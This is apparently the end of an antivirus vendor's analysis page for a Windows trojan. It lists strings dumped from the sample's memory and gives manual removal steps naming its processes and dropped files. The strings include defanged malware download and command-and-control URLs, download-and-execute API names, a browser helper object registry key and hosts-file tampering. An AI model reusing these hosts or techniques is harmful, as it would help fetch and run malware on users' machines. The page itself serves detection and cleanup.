SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
1.vbp
yswm.runsoft
yswm.exe

%original file name%.exe_516_rwx_02561000_0005E000:

function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
%d * %d
hXXp://yxtt.v138.net/send/yxjtc/yxjtz.htm
hXXp://yxtt.v138.net/send/yxjtc/yxjup.htm
IWebBrowser2
IWebBrowser2
RegCreateKeyTransactedW
RegOpenKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
\svn\InsertWnd\Release\InsertWnd.pdb
c:\%original file name%.exe
GetCPInfo
GetProcessHeap
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
RegCloseKey
RegDeleteKeyW
URLDownloadToFileW
EnumChildWindows
EnumWindows
DeleteUrlCacheEntryW
.text
`.rdata
@.data
.rsrc
@.reloc
combase.dll
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
portuguese-brazilian
hXXp://yxtt.v138.net/send/InsertWnd.txt
hXXp://yxtt.v138.net/send/yxjk/jzyxj.txt
hXXp://yxtt.v138.net/send/InsertWnd_2345title_en.dll
InsertWnd_2345title_en LoadLibrary DLLResLib.dll
E:\projects\InsertWnd\%s\Debug\Demo.exe
E:\projects\InsertWnd\%s\Release\Demo.exe
20151231
insert.txt
insert.tmp
id:%s
shell.Explorer.2
CreateInteriorIE %X %s
%s Navigate() -> m_pWeb
%s Navigate() -> m_axWnd.m_hWnd
Content-Type: application/x-www-form-urlencoded
%X %s m_pWeb->Navigate %s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
WAdvapi32.dll
[M/d/d d:d:d.d]
chrome
firefox
%X %s

%original file name%.exe_516_rwx_02631000_0004D000:

61.132.227.24
IP:61.132.227.24,
&8.8.8.8^
hXXp://
iexplore.exe
)^swclickmsg^icoJC*
\~IcsaVas32.tmp
hXXp://yxtt.yswm.net/send/ico2safe.txt
\~IcVas32.tmp
hXXp://yxtt.v138.net/send/dzjck/hzico.txt
hXXp://yxtt.yswm.net/send/ico2.txt
C:\Windows\Media
%Program Files%
\xsend.tmp
%Y-%m-%d %H:%M:%S
%Y%m%d%H
\system\~DF3812.TMP
hXXp://zmtb.yswm.net/Send.asp?id=
\~icabc.dfa
\~coicdk.tmp
hXXp://zmtb.yswm.net/xadf/config.txt
hXXp://zmtb.yswm.net/jx/config.txt
hXXp://zmtb.yswm.net/config.txt
hXXp://down.v718.com/ysIco/config.txt
hXXp://yxtt.v138.net/send/ico/hnico.txt
hXXp://yxtt.v138.net/send/ico/lhmico.txt
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
E:\work\fpProject\
\src\IcoJc\Release\IcoJc.pdb
%WinDir%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\xsend.tmp
c:\%original file name%.exe
[{000214A0-0000-0000-C000-000000000046}]
URL=hXXp://VVV.apyw.net/sy2/
HotKey=0
.rsrc
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
KERNEL32.DLL
GetProcessHeap
WinExec
GetCPInfo
ShellExecuteA
InternetOpenUrlA
.text
`.rdata
@.data
@.reloc
kernel32.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
mscoree.dll
USER32.DLL
portuguese-brazilian

%original file name%.exe_516_rwx_02691000_00063000:

operator
GetProcessWindowStation
E:\projects\DLLResLib\Release\DLLResLib.pdb
c:\%original file name%.exe
11032135
110430-90
2010-2011
2011-2012
20110217
20110225
2012-2013
83319111
20130901
EXOsShowTime
EXOsShowTime2013
SSHOWTIME
GagConcert
-2011114
-20111121
-20111123
-20111128
-2011115
VividRedOperation
WeBareBears
2013-2014
MissHOKUSAI
0072014
5202012
primopasso
secondpasso
-XTREMEXECUTOR
TheConcert
2014-2015
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL

%original file name%.exe_516_rwx_11001000_0002E000:

vb6chs.dll
MSWINSCK.OCX
MSWinsockLib.Winsock
AccUDP
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%System%\msvbvm60.dll\3
urlmon
URLDownloadToFileA
DownUrl
VBA6.DLL
epldrive.dll
mksparse.dll
DiskVolume.dll
oleaut32.dll
shell32.dll
winmm.dll
X%System%\MSWINSCK.oca
advapi32.dll
ws2_32.dll
wsock32.dll
LocalPort
RemotePort
WSOCK32.DLL
USER32.DLL
127.0.0.1
BakUrl
uMsg
lngPort
.text
`.data
.rsrc
@.reloc
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
\SoftP2P
2\P2P.vbp
hXXp://download.cpudln.com/8/ad15712.exe
c:\3.exe
hXXp://117.79.80.169/ad15712.exe
\~DFA90A3.TMP
255.255.255.255
The specified file is either a named or anonymous pipe
c:\windows\lock.log
Windows Sockets version
is not supported by winsock.dll
supported sockets.
SendUDP
Get Url:
123111123123
CSocketMaster.RemotePort
Invalid operation at current state
The argument passed to a function was not in the correct format or in the specified range.
CSocketMaster.RemoteHost
CSocketMaster.LocalPort
CSocketMaster.Protocol
CSocketMaster.DestroySocket
CSocketMaster.SocketExists
CSocketMaster.Connect
Unsupported variant type.
CSocketMaster.PostSocket
CSocketMaster.ConnectToIP
CSocketMaster.Bind
CSocketMaster.BindInternal
PORT:
CSocketMaster.SendData
CSocketMaster.GetLocalHostName
CSocketMaster.GetLocalIP
CSocketMaster.ResolveIfHostname
CSocketMaster.SendBufferedDataUDP
CSocketMaster.SendBufferedData
CSocketMaster.RecvDataToBuffer
CSocketMaster.ProcessOptions
CSocketMaster.GetData
CSocketMaster.PeekData
CSocketMaster.RecvData
CSocketMaster.Listen
CSocketMaster.Accept
modSocketMaster.InitiateProcesses
modSocketMaster.FinalizeProcesses
Address family not supported by protocol family.
Operation already in progress.
Operation now in progress.
Socket operation on nonsocket.
Operation not supported.
Protocol family not supported.
Protocol not supported.
Socket type not supported.
Winsock.dll version out of range.
modSocketMaster.DestroyWinsockMessageWindow
modSocketMaster.RegisterSocket


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    regsvr32.exe:1760
    regsvr32.exe:2020
    regsvr32.exe:1412
    sc.exe:1164
    sc.exe:896

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepro[1].txt (161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (11299 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (11385 bytes)
    %WinDir%\system\lock.dat (112 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\exitpop[1].txt (572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\insert.tmp (2490 bytes)
    %WinDir%\win.ini (4626 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\newDomain[1].txt (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFBIC753.TMP (17716 bytes)
    %WinDir%\lock.log (914 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\DFA2796.tmp (199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\InsertWnd[1].txt (671 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\InsertWnd_enlc[1].dll (19378 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\safeen[1].txt (670 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\pubjc[1].txt (21084 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFA90A3.TMP (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\osm[1].dll (11953 bytes)
    %Documents and Settings%\%current user%\Application Data\8901.dat (503 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\newcor[1].dll (34450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\yxjpq[1].txt (588 bytes)
    %System%\lockie.ini (112 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (845 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFA3334.tmp (3383 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (8314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (692 bytes)
    %System%\mswinsck.ocx (108 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\xsend.tmp (37241 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (6262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (58 bytes)
    %WinDir%\sys.dat (7212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\jzjc[1].txt (154 bytes)
    %System%\gdi30.dll (112 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jslist[1].txt (1405 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\file[1].txt (199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFA8273.tmp (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (4418 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (454 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ic[1].htm (219 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (154 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jzurl[1].txt (1224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (294 bytes)
    %System%\drivers\etc\hosts.tmp (2822 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\tfgg[1].txt (454 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\icdata[1].dll (18063 bytes)
    %WinDir%\xdrq\lockie.ini (208 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\eb[1].txt (1721 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (19996 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\InsertWnd_2345title_en[1].dll (16223 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (1006 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DUs6109.tmp (503 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\serList[1].txt (1521 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\prosafe[1].txt (845 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFA6871.tmp (11948 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\urlRemote[1].txt (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (503 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (388 bytes)
    %WinDir%\Media\ad.ini (572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~DFBC263.TMP (16428 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (1824 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
